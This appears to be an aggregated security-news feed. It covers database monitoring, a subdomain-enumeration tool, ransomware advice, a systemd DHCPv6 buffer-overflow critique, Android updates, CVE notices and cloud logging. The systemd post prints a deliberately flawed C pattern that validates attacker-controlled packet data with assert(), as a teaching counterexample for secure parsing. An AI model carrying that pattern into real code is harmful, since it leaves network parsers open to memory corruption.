  3. Network Security: Between segmentation, firewalls/security groups, and port management you can really lock down the (virtual) network so only the application can talk to the database. Difficult for anyone to end-run around if properly set up.

  4. Database Ownership: Some people cling to the misconception that the database is owned and operated by the cloud provider, so they will take care of database security. Yes, the vendor handles lots of configuration security and patching for you. Certainly much of the value of a DAM platform, namely security assessment and detection of old database versions, is handled elsewhere.

  5. Permission misuse is harder. Most IaaS clouds offer dynamic policy-driven IAM. You can set very fine-grained access controls on database access, so you can block many types of ad hoc and potentially malicious queries.

Maybe none of these reasons? Maybe all the above? I don’t really know. Regardless, DAM has not moved to the cloud. The lack of interest does not provide any real insights as to why, but it is very clear.

I do still want some of DAM’s monitoring functions for cloud migrations, specifically looking for SQL injection attacks – which are still your issue to deal with – as well as looking for credential misuse, such as detecting too much data transfer or scraping. Cloud providers log API access to the database installation, and there are cloud-native ways to perform assessment. But on the monitoring side there are few other options for watching SQL queries.

- Adrian Lane

CTFR – Abuse Certificate Transparency Logs For HTTPS Subdomains

CTFR is a Python-based tool that abuses Certificate Transparency logs to get subdomains from an HTTPS website in a few seconds.

You missed the AXFR technique (open DNS zone transfers), didn’t you? So how does CTFR work? It doesn’t use dictionary or brute-force attacks; it just helps you abuse Certificate Transparency logs.

What is Certificate Transparency?

Google’s Certificate Transparency project fixes several structural flaws in the SSL certificate system, which is the main cryptographic system that underlies all HTTPS connections.

Read the rest of CTFR – Abuse Certificate Transparency Logs For HTTPS Subdomains now! Only available at Darknet.

How HTTPS Works – Let’s Establish a Secure Connection

The need to use HTTPS on your website has been spearheaded by Google for years (since 2014), and in 2018 we saw massive improvements as more of the web became...

The post How HTTPS Works – Let’s Establish a Secure Connection appeared first on PerezBox.

Ghouls of the Internet: Protecting Your Family from Scareware and Ransomware

It’s the middle of a workday. While you’re researching a project, a random ad pops up on your computer screen alerting you of a virus. The scary-looking, flashing warning tells you to download an “anti-virus software” immediately. Impulsively, you do just that, either grabbing the free version or paying $9.99 for the critical download.

But here’s the catch: There’s no virus, no download needed, you’ve lost your money, and worse, you’ve shared your credit card number with a crook. Worse still, your computer screen is now frozen or sluggish as your new download (disguised malware) collects the data housed on your laptop and funnels it to a third party to be used or sold on the dark web.

Dreadful Downloads

This scenario is called scareware — a form of malware that scares users into fictitious downloads designed to gain access to your data. Scareware bombards you with flashing warnings to purchase a bogus commercial firewall, computer cleaning software, or anti-virus software. Cybercriminals are smart and package the suggested download in a way that mimics legitimate security software to dupe consumers. Don’t feel bad; a lot of intelligent people fall for scareware every day.

Sadly, a more sinister cousin to scareware is ransomware, which can unleash serious digital mayhem into your personal life or business. Ransomware scenarios vary and happen to more people than you may think.

Malicious Mayhem

What is Ransomware? Ransomware is a form of malicious software (also called malware) that is a lot more complicated than typical malware. A ransomware infection often starts with a computer user clicking on what looks like a standard email attachment, only that attachment unlocks malware that will encrypt or lock computer files.

A ransomware attack can cause incredible emotional and financial distress for individuals, businesses, or large companies or organizations. Criminals hold data ransom and demand a fee to release your files back to you. Many people think they have no choice but to pay the demanded fee. Ransomware can be large-scale, such as the attack on the City of Atlanta, considered the largest and most expensive cyber disruption of a city government to date, or last year’s WannaCry attack, which affected some 200,000+ computers worldwide. Ransomware attacks can be aimed at any number of data-heavy targets such as labs, municipalities, banks, law firms, and hospitals.

Criminals can also get very personal with ransomware threats. Some reports of ransomware include teens and older adults receiving emails that falsely accuse them of browsing illegal websites. The notice demands payment or else the user will be exposed to everyone in his or her contact list. Many of these threats go unreported because victims are too embarrassed to do anything.

Digital Terrorists

According to the Cisco 2017 Annual Cybersecurity Report, ransomware is growing at a yearly rate of 350% and, according to Microsoft, accounted for roughly $325 million in damages in 2015. Most security experts advise against paying any ransoms since paying the ransom is no guarantee you’ll get your files back and may encourage a second attack.

Cybercriminals are full-time digital terrorists and know that a majority of people know little or nothing about their schemes. And, unfortunately, as long as our devices are connected to a network, our data is vulnerable. But rather than living anxiously about the possibility of a scareware or ransomware attack, your family can take steps to reduce the threat.

Tips to keep your family’s data secure:

Talk about it. Education is first, and action follows. So, share information on the realities of scareware and ransomware with your family. Just discussing the threats that exist, sharing resources, and keeping the issue of cybercrime in the conversation helps everyone be more aware and ready to make wise decisions online.

Back up everything! A cybercriminal’s primary goal is to get his or her hands on your data, and either use it or sell it on the dark web (scareware) or access it and lock it down for a price (ransomware). So, back up your data every chance you get on an external hard drive or in the cloud. If a ransomware attack hits your family, you may panic about your family photos, original art, writing, or music, and other valuable content. While backing up data helps you retrieve and restore files lost in a potential malware attack, it won’t keep someone from stealing what’s on your laptop.

Be careful with each click. Being aware and mindful of the links and attachments you’re clicking on can reduce your chances of malware attacks in general. However, crooks are getting sophisticated and linking ransomware to emails from seemingly friendly sources. So, if you get an unexpected email with an attachment or random link from a friend or colleague, pause before opening the email attachment. Only click on emails from a trusted source.

Update devices.  Making sure your operating system is current is at the top of the list when it comes to guarding against malware attacks. Why? Because nearly every software update contains security improvements that help secure your computer from new threats. Better yet, go into your computer settings and schedule automatic updates. If you are a Windows user, immediately apply any Windows security patches that Microsoft sends you.

Add a layer of security. It’s easy to ignore the idea of a malware attack — until one happens to you. Avoid this crisis by adding an extra layer of protection with a consumer product specifically designed to protect your home computer against malware and viruses. Once you’ve installed the software, be sure to keep it updated since new variants of malware arise all the time.

If infected: Worst case scenario, if you find yourself with a ransomware notice, immediately disconnect everything from the Internet. Hackers need an active connection to mobilize the ransomware and monitor your system. Once you disconnect from the Internet, follow these next critical steps.

The post Ghouls of the Internet: Protecting Your Family from Scareware and Ransomware appeared first on McAfee Blogs.

Systemd is bad parsing and should feel bad

Systemd has a remotely exploitable bug in its DHCPv6 client. That means anybody on the local network can send you a packet and take control of your computer. The flaw is a typical buffer-overflow. Several news stories have pointed out that this client was rewritten from scratch, as if that were the moral failing, instead of reusing existing code. That's not the problem.

The problem is that it was rewritten from scratch without taking advantage of the lessons of the past. It makes the same mistakes all over again.

In the late 1990s and early 2000s, we learned that parsing input is a problem. The traditional ad hoc approach you were taught in school is wrong. It's wrong from an abstract theoretical point of view. It's wrong from the practical point of view, error prone and leading to spaghetti code.

The first thing you need to unlearn is byte-swapping. I know that this was some sort of epiphany you had when you learned network programming, but byte-swapping is wrong. If you find yourself using a macro to swap bytes, like the be16toh() macro used in this code, then you are doing it wrong.

But, you say, the network byte-order is big-endian, while today's Intel and ARM processors are little-endian. So you have to swap bytes, don't you?

No. As proof of the matter I point to every language other than C/C++. They don't swap bytes. Their internal integer format is undefined. Indeed, something like JavaScript may be storing numbers as floating point. You can't muck around with the internal format of their integers even if you wanted to.

An example of byte swapping in the code is something like this:

In this code, it's taking a buffer of raw bytes from the DHCPv6 packet and "casting" it as a C internal structure. The packet contains a two-byte big-endian length field, "option->len", which the code must byte-swap in order to use.

Among the errors here is casting an internal structure over external data. From an abstract theory point of view, this is wrong. Internal structures are undefined. Just because you can sort of know the definition in C/C++ doesn't change the fact that they are still undefined.

From a practical point of view, this leads to confusion, as the programmer is never quite clear as to the boundary between external and internal data. You are supposed to rigorously verify external data, because the hacker controls it. You don't keep double-checking and second-guessing internal data, because that would be stupid. When you blur the lines between internal and external data, then your checks get muddled up.

Yes you can, in C/C++, cast an internal structure over external data. But just because you can doesn't mean you should. What you should do instead is parse data the same way as if you were writing code in JavaScript. For example, to grab the DHCP6 option length field, you should write something like:
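A hedged reconstruction (the variable names are assumptions): extract the two big-endian bytes and combine them arithmetically. The assignment in the body is the shared C/JavaScript idiom; the function declaration around it is just C scaffolding so the sketch compiles.

```c
#include <stddef.h>
#include <stdint.h>

/* Combine two big-endian bytes into an integer, with no byte-swap macro
   and no struct cast. */
unsigned option_len_portable(const uint8_t *buf, size_t offset)
{
    unsigned len = (buf[offset + 0] << 8) | buf[offset + 1];
    return len;
}
```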

The thing about this code is that you don't know whether it's JavaScript or C, because it's both, and it does the same thing for both.

Byte "swapping" isn't happening. We aren't extracting an integer from a packet, then changing its internal format. Instead, we are extracting two bytes and combining them. This description may seem like needless pedantry, but it's really really important that you grok this. For example, there is no conditional macro here that does one operation for a little-endian CPU, and another operation for a big-endian CPU -- it does the same thing for both CPUs. Whatever words you want to use to describe the difference, it's still profound and important.

The other thing that you shouldn't do, even though C/C++ allows it, is pointer arithmetic. Again, it's one of those epiphany things C programmers remember from their early days. It's something they just couldn't grasp until one day they did, and then they fell in love with it. Except it's bad. The reason you struggled to grok it is because it's stupid and you shouldn't be using it. No other language has it, because it's bad.

I mean, back in the day, it was a useful performance optimization. Iterating through an array can be faster by advancing a pointer than by incrementing an index. But that's virtually never the case today, and it just leads to needless spaghetti code. It leads to convoluted constructions like the following at the heart of this bug, where you have to do arithmetic on the pointer as well as on the length you are checking against. This nonsense leads to confusion and, ultimately, buffer overflows.

In a heckofalot of buffer overflows over the years, there's a construct just like this lurking near the bug. If you are going to do a rewrite of code, then this is a construct you need to avoid. Just say no to pointer arithmetic.

In my code, you see a lot of constructs where it's buf, offset, and length. The buf variable points to the start of the buffer and is never incremented. The length variable is the max length of the buffer and likewise never changes. It's the offset variable that is incremented throughout.
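Sketched out (the names are illustrative), the same option walk looks like this: buf and length never change, only offset advances, so every check has the same shape.

```c
#include <stddef.h>
#include <stdint.h>

/* Walk the same option list buf/offset/length style and count the options.
   buf and length are never modified; only offset moves forward. */
size_t count_options_offset_style(const uint8_t *buf, size_t length)
{
    size_t offset = 0;
    size_t n = 0;

    while (offset + 4 <= length) {                   /* room for the header? */
        size_t len = (buf[offset + 2] << 8) | buf[offset + 3];

        if (offset + 4 + len > length)               /* always offset + x vs length */
            break;
        n++;
        offset += 4 + len;
    }
    return n;
}
```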

Because of simplicity, buffer overflow checks become obvious, as it's always "offset + x < length", and easy to verify. In contrast, here is the fix for the DHCPv6 buffer overflow. That this is checking for an external buffer overflow is less obvious:
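Paraphrased (not the verbatim commit, and the names are assumptions), the fix amounts to a check of this shape, returning ENOBUFS when the remaining output buffer is too small:

```c
#include <errno.h>
#include <stddef.h>

/* Paraphrase of the published fix: refuse to append an option that will
   not fit in what remains of the output buffer. */
int check_option_room(size_t remaining, size_t optlen)
{
    if (optlen > remaining)
        return -ENOBUFS;   /* a kernel-flavored errno reused in userland */
    return 0;
}
```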

Now let's look at that error code. That's not what ENOBUFS really means. That's an operating system error code that has specific meaning about kernel buffers. Overloading it for userland code is inappropriate.

That argument is a bit pedantic, I grant you, but that's only the start. The bigger issue is that it's identifying the symptom, not the problem. The ultimate problem is that the code failed to sanitize the original input, allowing the hacker to drive computation this deep into the system. The error isn't that the buffer is too small to hold the output; the original error is that the input was too big. Imagine if this gets logged and the sysadmin reviewing dmesg asks themselves how they can allocate bigger buffers to the DHCP6 daemon. That is entirely the wrong idea.

Again, we go back to lessons of 20 years that this code ignored, the necessity of sanitizing input.

Now let's look at assert(). This is a feature in C that we use to double-check things in order to catch programming mistakes early. An example is the code below, which is checking for programming mistakes where the caller of the function may have used NULL-pointers:
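(Reconstructed sketch; the signature and names are assumptions, not the verbatim systemd code. The point is that these asserts fire only if the programmer calling the function broke its contract by passing NULL.)

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Legitimate assert() use: catch a caller that violated the function's
   contract by passing NULL pointers. These are programmer errors, never
   values that an attacker controls. */
int option_append_hdr(uint8_t **buf, size_t *buflen, uint16_t optcode)
{
    assert(buf);       /* caller bug, not bad input */
    assert(*buf);
    assert(buflen);

    (void)optcode;     /* header-writing elided in this sketch */
    return 0;
}
```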

This is pretty normal, but now consider this other use of assert().
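(Again a reconstructed sketch, not the verbatim lines: here the asserted value comes straight off the wire, so a hostile packet can trip the assert, or, in a build with NDEBUG, sail right past it.)

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* The misuse: optlen comes from the packet, i.e. from the attacker, yet it
   is "validated" with assert() as if it were a programmer invariant. */
int parse_option(const uint8_t *packet, size_t packet_len)
{
    uint16_t optlen = (packet[2] << 8) | packet[3];

    assert(optlen <= packet_len - 4);   /* WRONG: external input in assert */

    return (int)optlen;
}
```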

This isn't checking for errors by the programmer; it's validating input. That's not what you are supposed to use asserts for. These are very different things. It's a coding horror that makes you shriek and run away when you see it. In fact, that's my Halloween costume this year: using asserts to validate network input.

This reflects a naive misunderstanding by programmers who don't grasp the difference between out-of-band checks that validate the code and the code's actual job of validating input. Like the buffer overflow check above, EINVAL because a programmer made a mistake is a vastly different error than EINVAL because a hacker tried to inject bad input. These aren't the same things; they aren't even in the same realm.


Rewriting old code is a good thing -- as long as you are fixing the problems of the past and not repeating them. We have 20 years of experience with what goes wrong in network code. We have academic disciplines like langsec that study the problem. We have lots of good examples of network parsing done well. There is really no excuse for code that is of this low quality.

This code has no redeeming features. It must be thrown away and rewritten yet again, this time by an experienced programmer who knows what error codes mean, how to use asserts properly, and, most of all, who has experience with network programming.

Google sets Android security updates rules but enforcement is unclear

The vendor requirements for Android are a strange and mysterious thing but a new leak claims Google has added language to force manufacturers to push more regular Android security updates.

According to The Verge, Google’s latest contract will require OEMs to supply Android security updates for two years and provide at least four updates within the first year of a device’s release. Vendors will also have to release patches within 90 days of Google identifying a vulnerability.

Mandating more consistent Android security updates is certainly a good thing, but it remains unclear what penalties Google would levy against manufacturers that fail to provide the updates or if Google would follow through on any punitive actions.

It has been known for years that Google sets certain rules for manufacturers who want to include the Play Store, Play services and Google apps on Android devices, but because enforcement has been unclear the rules have sometimes been seen as mere suggestions.

For example, Google has had a requirement in place since the spring of 2011 mandating that manufacturers upgrade devices to the latest version of the Android OS released within 18 months of a device’s launch. However, because of the logistical issues of providing those OS updates, Google has rarely been known to enforce that requirement.

This can be seen in the Android OS distribution numbers, which are a complete mess. Currently, according to Google, the most popular version of Android on devices in the wild is Android 6.0 Marshmallow (21.6%), followed by Android 7.0 (19%), Android 5.1 (14.7%), Android 8.0 (13.4%) and Android 7.1 (10.3%). Android 9.0, released in August, doesn’t even show up in Google’s numbers because it hasn’t hit the 0.1% threshold for inclusion.

Theoretically, the ultimate enforcement of the Android requirements would be Google barring a manufacturer from releasing a device that includes Google apps and services, but there have been no reports of that ever happening. Plus, the European Union’s recent crackdown on Android gives an indication that Google does wield control over the Android ecosystem — and was found to be abusing that power.

The ruling in the EU will allow major OEMs to release forked versions of Android without Google apps and services (something they were previously barred from doing by Google’s contract). It will also force Google to bundle the Play Store, services and most Google apps into a paid licensing bundle, while offering — but not requiring — the Chrome browser and Search as a free bundle. Early rumors, though, suggest Google might offset the cost of the apps bundle by paying OEMs to use Chrome and Google Search, effectively making it all free and sidestepping any actual change.

These changes only apply to Android devices released in the EU, but it should lead to more devices on the market running Android but featuring third-party apps and services. This could mean some real competition for Google from less popular Android forks such as Amazon’s Fire OS or Xiaomi’s MIUI.

It’s still unknown if the new rules regarding Android security updates are for the U.S. only or if they will be part of contracts in other regions. But, an unintended consequence of the EU rules might be to strengthen Google’s claim that the most secure Android devices are those with the Play Store and Play services.

Google has long leaned on its strong record of keeping malware out of the Play Store and off of user devices, if Play services are installed. Google consistently shows that the highest rates of malware come from sideloading apps in regions where the Play Store and Play services are less common and third-party sources are more popular, such as Russia and China.

Assuming the requirements for Android security updates do apply in other regions around the globe, it might be fair to also assume they’d be tied to the Google apps and services bundle (at least in the EU) because otherwise Google would have no way to put teeth behind the rules. So, not only would Google have its stats regarding how much malware is taken care of in the Play Store and on user devices by Play services, it might also have more stats showing those devices are more consistently updated and patched.

The Play Store, services and Google apps are an enticing carrot to dangle in front of vendors when requiring things like Android security updates, and there is reason to believe manufacturers would be willing to comply in order to get those apps and services, even if the penalties are unclear.

More competition will be coming to the Android ecosystem in the EU, and it’s not unreasonable to think that competition could spread to the U.S., especially if Google is scared to face similar actions by the U.S. government (as unlikely as that may seem).  And the less power Google apps and services have in the market, the  less force there will be behind any Google requirements for security updates.


The post Google sets Android security updates rules but enforcement is unclear appeared first on Security Bytes.

DisruptOps: Consolidating Config Guardrails with Aggregators



In Quick and Dirty: Building an S3 guardrail with Config we highlighted that one of the big problems with Config is that you need to set it up in every region of every account separately. Your best bet to make that manageable is to use infrastructure-as-code tools like CloudFormation to replicate your settings across environments. We have a lot more to say on scaling out baseline security and operations settings, but for this post I want to highlight how to aggregate Config into a unified dashboard.

Read the full post at DisruptOps

- Rich

CVE-2018-5914 (mdm9206_firmware, mdm9607_firmware, mdm9650_firmware, sd_205_firmware, sd_210_firmware, sd_212_firmware, sd_425_firmware, sd_430_firmware, sd_450_firmware, sd_625_firmware, sd_650_firmware, sd_652_firmware, sd_835_firmware, sda660_firmware)

Improper input validation in TZ led to array out of bound in TZ function while accessing the peripheral details using the incoming data in Snapdragon Mobile, Snapdragon Wear version MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 835, SDA660.

CVE-2018-5866 (mdm9206_firmware, mdm9607_firmware, mdm9650_firmware, sd_205_firmware, sd_210_firmware, sd_212_firmware, sd_425_firmware, sd_430_firmware, sd_450_firmware, sd_625_firmware, sd_650_firmware, sd_652_firmware, sd_835_firmware, sd_845_firmware, sd_850_firmware, sda660_firmware)

While processing logs, data is copied into a buffer pointed to by an untrusted pointer in Snapdragon Mobile, Snapdragon Wear in version MDM9206, MDM9607, MDM9650, SD 210/SD 212/SD 205, SD 425, SD 430, SD 450, SD 625, SD 650/52, SD 835, SD 845, SD 850, SDA660.

Uber hackers also reportedly breached LinkedIn’s training site

The hackers who were responsible for the Uber data breach that affected 57 million users around the world have been indicted... for another hack altogether, according to TechCrunch. Canadian citizen Vasile Mereacre and Florida resident Brandon Glover have been indicted for stealing account information from Lynda, LinkedIn's training site, but a TechCrunch source said they were also behind the massive Uber breach back in 2016. If true, then they got caught for a much smaller scheme: the Lynda cyberattack only compromised 55,000 accounts.

Source: TechCrunch

Risky Biz Soap Box: Duo’s Olabode Anise recaps his Black Hat talk on Twitter bots

Soap Box is the wholly sponsored podcast series we do where vendors pay to participate. They sometimes want to talk about their products, other times they want to talk about general ecosystem stuff, other times they want to talk about research they’ve done.

And that’s what’s happening today! Olabode Anise is a data scientist at Duo Security. He and his colleague Jordan Wright put together a talk for Black Hat this year all about Twitter bots, called “Don’t @ Me: Hunting Twitter Bots at Scale.”

As you’ll hear, finding bots on Twitter at scale isn’t that hard, but doing so with 100% confidence isn’t as easy as you’d think.

You can check out a blog post from Olabode in the show notes below.

MPOWER Americas Cybersecurity Summit 2018 is a Wrap!

This year’s MPOWER Americas was packed with innovative keynote speakers, the MPOWER Partner Summit, tons of sessions, technical deep dives, demos, an Innovation Fair, and much more. Take a look at some of the highlights from this year’s event!

“Together is Power” in Action at Partner Summit

On Tuesday, we hosted Partner Summit, our first event associated with MPOWER 2018. During the event, head of channel sales and operations for the Americas, Ken McCray, took the stage and discussed the road map going forward and new opportunities for partners. He emphasized the important role partners play in McAfee’s strategy to provide threat defense and data protection from device to cloud.

During Partner Summit, we also announced the addition of 17 new partners and 16 newly certified integrations to the Security Innovation Alliance. The program now includes 152 partners worldwide and highlights the need for the cybersecurity industry to work together to handle the challenges of today’s changing cyberthreat landscape.

Before the day came to a close, we announced the winners of our distinguished Partner Awards, which recognize partners who embody the three foundational pillars of the McAfee Partner Program: strategic relationships, profitable partnerships, and driving better customer outcomes.

Day One of MPOWER Americas 2018

MPOWER officially kicked off when McAfee CEO, Chris Young, welcomed attendees and urged everyone to think about the road map to the future we’re building together. He explored three key factors defining that map: the constantly evolving threatscape, the ever-shifting technology landscape, and regulators working to protect individuals and their data as threats and technology evolve.

MVISION EDR and MVISION Cloud Announced on MPOWER Mainstage

At MPOWER, Chris Young announced the latest additions to the MVISION product family: MVISION Endpoint Detection and Response (MVISION EDR), an offering that provides new endpoint security capabilities, and MVISION Cloud, which is based on technology gained via the acquisition of Skyhigh Networks in early 2018.

Vice president and general manager of corporate products, Raja Patel, and principal engineer Ismael Valenzuela took the mainstage to demonstrate how MVISION EDR, as a cloud-native solution, helps human responders detect, remediate, and investigate threats with more speed and agility. Raja Patel said that the goal of MVISION EDR is to reduce the time it takes to detect and respond to threats.

Senior vice president of the cloud security business unit, Rajiv Gupta, then introduced MVISION Cloud. He explained that it’s a cloud-native platform that integrates seamlessly with cloud service providers, giving businesses the comprehensive control they need to enable employees, developers, and partners to be productive, while satisfying customers and accelerating business.

Day One keynotes wrapped up with a compelling talk by acclaimed journalist and historian Walter Isaacson. He was then joined by McAfee CMO, Allison Cerra, for a fireside chat. They discussed innovation, collaboration, and networking.

Day Two of MPOWER Americas 2018

Chris Young started Day Two of MPOWER talking about how MVISION’s management-led, cloud-delivered tools answer the call of today’s constantly evolving threatscape. He emphasized that MVISION optimizes our customers’ resources so they can spend more time running their security programs and fighting adversaries.

Following Chris Young’s closing remarks, Sir Tim Berners-Lee, the inventor of the World Wide Web, shared an inspiring keynote and was then joined by Rob Sloan from the Wall Street Journal for an insightful conversation about data, privacy, and how we can continue to secure the World Wide Web.

Saving the best for last, senior vice president and CTO, Steve Grobman, took the stage to reveal Project Apollo, a pipeline to ingest, redact, and analyze 116 million data points in just five minutes. He said Project Apollo will help McAfee customers increase situational awareness and visibility so they can derive actionable insights by combining what’s coming from their own environment with threat intelligence data collected by over 1 billion McAfee sensors from networks, endpoints, the perimeter, and the cloud worldwide.

Advanced Threat Research Team Reveals Operation Oceansalt

On the last day of MPOWER, our Advanced Threat Research team revealed their latest discovery: Operation Oceansalt, a new cyberespionage campaign targeting South Korea, the United States, and Canada. It uses a 2010 data reconnaissance implant from the hacker group APT1, or Comment Crew, a Chinese military-affiliated group.

Thank you everyone who attended MPOWER Americas 2018. We hope to see you next year!


The post MPOWER Americas Cybersecurity Summit 2018 is a Wrap! appeared first on McAfee Blogs.

Cloudera and Hortonworks Merge

Posted under: News

I had been planning to post on the recent announcement of the planned merger between Hortonworks and Cloudera, as there are a number of trends I’ve been witnessing with the adoption of Hadoop clusters, and this merger reflects them in a nutshell. But catching up on my reading I ran across Mathew Lodge’s recent article in VentureBeat titled Cloudera and Hortonworks merger means Hadoop’s influence is declining. It’s a really good post. I can confirm we see the same lack of interest in deployment of Hadoop to the cloud, the same use of S3 as a storage medium when Hadoop is used atop Infrastructure as a Service (IaaS), and the same developer-driven selection of whatever platform is easiest to use and deploy on. All in all it’s an article I wish I’d written, as he did a great job capturing most of the areas I wanted to cover. And there are some humorous bits like “Ironically, there has been no Cloud Era for Cloudera.” Check it out – it’s worth your time.

But there are a couple other areas I still want to cover.

It is rare to see someone install Hadoop into a public IaaS account. Customers now choose a cloud-native variant and let the vendor handle all the patching and hide much of the infrastructure from them. And they gain the option of spinning down the cluster when not in use, making it much more efficient. Couple that with all the work needed to set up Hadoop yourself, and it’s an easy decision. I was somewhat surprised to learn that things like AWS’s Elastic MapReduce (EMR) are not always chosen as the repository; DynamoDB is surprisingly popular – which makes sense, given its powerful query features, indexing, and ability to offer the best of relational and big data capabilities. Most public IaaS vendors offer so many database variants that it is easy to mix and match several to support applications, further reducing demand for classic Hadoop installations.

One area continuing to drive Hadoop adoption is on-premise data collection and data lakes for logs. The most cited driver is the need to keep Splunk costs under control. It takes effort to divert some content to Hadoop instead of sending everything to the Splunk collectors – but data can be collected and held at drastically lower cost. And you need not sacrifice analytics. For organizations collecting every log entry, this is a win. We also see Hadoop adopted by Security Operations Centers, running side by side with other platforms. Part of the need is to fill gaps around what their SIEM keeps, part is to keep costs down, and part is to easily support deployment of custom security intelligence applications by non-developers.

Another aspect not covered in any of the articles I have found so far is that Cloudera and Hortonworks both have deep catalogs of security capabilities. Together they are dominant. As firms use large “data lakes” to hold all sorts of sensitive data inside Hadoop, this will be a win for firms running Hadoop in-house. Identity management, encryption, monitoring, and a whole bunch of other great stuff. Big data is not the security issue it was 5 years ago. Hortonworks and Cloudera have a lot to do with that; their combined capabilities and enterprise deployment experience make them a powerful choice to help firms manage and maintain existing infrastructure. That is all my way of saying that some of their negative press is unwarranted, given the profitable avenues ahead.

The observation that growth in the Hadoop segment has been slowing is not new. AWS has been the largest seller of Hadoop-based data platforms, by revenue and by customer, for several years. The cloud is genuinely an existential threat to all the commercial Hadoop vendors – and comparable big data databases – if they continue to sell in the same way. The recent acceleration of cloud adoption simply makes it more apparent that Cloudera and Hortonworks are competing for a shrinking share of IT budgets. But it makes sense to band together and make the most of their expertise in enterprise Hadoop deployments, and should help with tooling and management software for cloud migrations. If Kubernetes is any indication, there are huge areas for improvement in tooling and services beyond what cloud vendors provide.

- Adrian Lane

Have Network, Need Network Security Monitoring

I have been associated with network security monitoring my entire cybersecurity career, so I am obviously biased towards network-centric security strategies and technologies. I also work for a network security monitoring company (Corelight), but I am not writing this post in any corporate capacity.

There is a tendency in many aspects of the security operations community to shy away from network-centric approaches. The rise of encryption and cloud platforms, the argument goes, makes methodologies like NSM less relevant. The natural response seems to be migration towards the endpoint, because it is still possible to deploy agents on general purpose computing devices in order to instrument and interdict on the endpoint itself.

It occurred to me this morning that this tendency ignores the fact that the trend in computing is toward closed computing devices. Mobile platforms, especially those running Apple's iOS, are not friendly to introducing third party code for the purpose of "security." In fact, one could argue that iOS is one of the most secure platforms, if not the most secure, thanks to this architectural decision. (Timely and regular updates, a policed applications store, and other choices are undoubtedly part of the security success of iOS, to be sure.)

How is the endpoint-centric security strategy going to work when security teams are no longer able to install third party endpoint agents? The answer is -- it will not. What will security teams be left with?

The answer is probably application logging, i.e., usage and activity reports from the software with which users interact. Most of this will likely be hosted in the cloud. Therefore, security teams responsible for protecting work-anywhere, remote-intensive users accessing cloud-hosted assets will really have only cloud-provided data to analyze and escalate.

It's possible that the endpoint providers themselves might assume a greater security role. In other words, Apple and other manufacturers provide security information directly to users. This could be like Chase asking if I really made a purchase. This model tends to break down when one is using a potentially compromised asset to ask the user if that asset is compromised.

In any case, this vision of the future ignores the fact that someone will still be providing network services. My contention is that if you are responsible for a network, you are responsible for monitoring it.

It is negligent to provide network services but ignore abuse of that service.

If you disagree and cite the "common carrier" exception, I would agree to a certain extent. However, one cannot easily fall back on that defense in an age where Facebook, Twitter, and other platforms are being told to police their infrastructure or face ever more government regulation.

At the end of the day, using modern Internet services means, by definition, using someone's network. Whoever is providing that network will need to instrument it, if only to avoid the liability associated with misuse. Therefore, anyone operating a network would do well to continue to deploy and operate network security monitoring capabilities.

We may be in a golden age of endpoint visibility, but closure of those platforms will end the endpoint's viability as a source of security logging. So long as there are networks, we will need network security monitoring.

Building a Multi-cloud Logging Strategy: Introduction

Posted under: Heavy Research

Logging and monitoring for cloud infrastructure has become the top topic we are asked about lately. Even general conversations about moving applications to the cloud always seem to end with clients asking how to ‘do’ logging and monitoring of cloud infrastructure. Logs are key to security and compliance, and moving into cloud services – where you do not actually control the infrastructure – makes logs even more important for operations, risk, and security teams. But these questions make perfect sense – logging in and across cloud infrastructure is complicated, offering technical challenges and huge potential cost overruns if implemented poorly.

The road to cloud is littered with the charred remains of many who have attempted to create multi-cloud logging for their respective employers. But cloud services are very different – structurally and operationally – from on-premise systems. The data is different: you do not necessarily have the same event sources, and what you do get is often incomplete, so existing reports and analytics may not work the same. Cloud services are ephemeral, so you can’t count on a server “being there” when you go looking for it, and IP addresses are unreliable identifiers. Networks may appear to behave the same, but they are software defined, so you cannot tap into them the way you would on-premise, nor make sense of the packets even if you could. How you detect and respond to attacks differs too, leveraging automation to be as agile as your infrastructure. Some logs capture every API call; their granularity of information is great, but the volume is substantial. And finally, many companies lack people who understand cloud, so they ‘lift and shift’ what they do today into their cloud service, and are then forced to refactor the deployment later.

One aspect that surprised all of us here at Securosis is the adoption of multi-cloud; we do not simply mean some Software as a Service (SaaS) along with a single Infrastructure as a Service (IaaS) provider – instead firms are choosing multiple IaaS vendors and deploying different applications to each. Sometimes this is a “best of breed” approach, but far more often the selection of multiple vendors is driven by fear of getting locked in with a single vendor. This makes logging and monitoring even more difficult, as collection across IaaS providers and on-premise all vary in capabilities, events, and integration points.

Further complicating the matter is the fact that existing Security Information and Event Management (SIEM) vendors, as well as some security analytics vendors, are behind the cloud adoption curve. Some because their cloud deployment models are no different than what they offer for on-premise, making integration with cloud services awkward. Some because their solutions rely on traditional network approaches which don’t work with software defined networks. Still others employ pricing models which, when hooked into highly verbose cloud log sources, cost customers small fortunes. We will demonstrate some of these pricing models later in this paper.

Here are some common questions:

  • What data or logs do I need? Server/network/container/app/API/storage/etc.?
  • How do I get them turned on? How do I move them off the sources?
  • How do I get data back to my SIEM? Can my existing SIEM handle these logs, in terms of both different schema and volume & rate?
  • Should I use log aggregators and send everything back to my analytics platform? At what point during my transition to cloud does this change?
  • How do I capture packets and where do I put them?

These questions, and many others, are telling because they come from trying to fit cloud events into existing/on-premise tools and processes. It’s not that they are wrong, but they highlight an effort to map new data into old and familiar systems. Instead you need to rethink your logging and monitoring approach.

The questions firms should be asking include:

  • What should my logging architecture look like now and how should it change?
  • How do I handle multiple accounts across multiple providers?
  • What cloud native sources should I leverage?
  • How do I keep my costs manageable? Storage can be incredibly cheap and plentiful in the cloud, but what is the pricing model for various services which ingest and analyze the data I’m sending them?
  • What should I send to my existing data analytics tools? My SIEM?
  • How do I adjust what I monitor for cloud security?
  • Batch or real-time streams? Or both?
  • How do I adjust analytics for cloud?

You need to take a fresh look at logging and monitoring, and adapt both IT and security workflows to fit cloud services – especially if you’re transitioning to cloud from an on-premise environment and will be running a hybrid environment during the transition… which may be several years from initial project kick-off.

Today we launch a new series on Building a Multi-cloud Logging Strategy. Over the next few weeks, Gal Shpantzer and I (Adrian Lane) will dig into the following topics to discuss what we see when helping firms migrate to cloud. And there is a lot to cover.

Our tentative outline is as follows:

  1. Barriers to Success: This post will discuss some reasons traditional approaches do not work, and areas where you might lack visibility.
  2. Cloud Logging Architectures: We discuss anti-patterns and more productive approaches to logging. We will offer recommendations on reference architectures to help with multi-cloud, as well as centralized management.
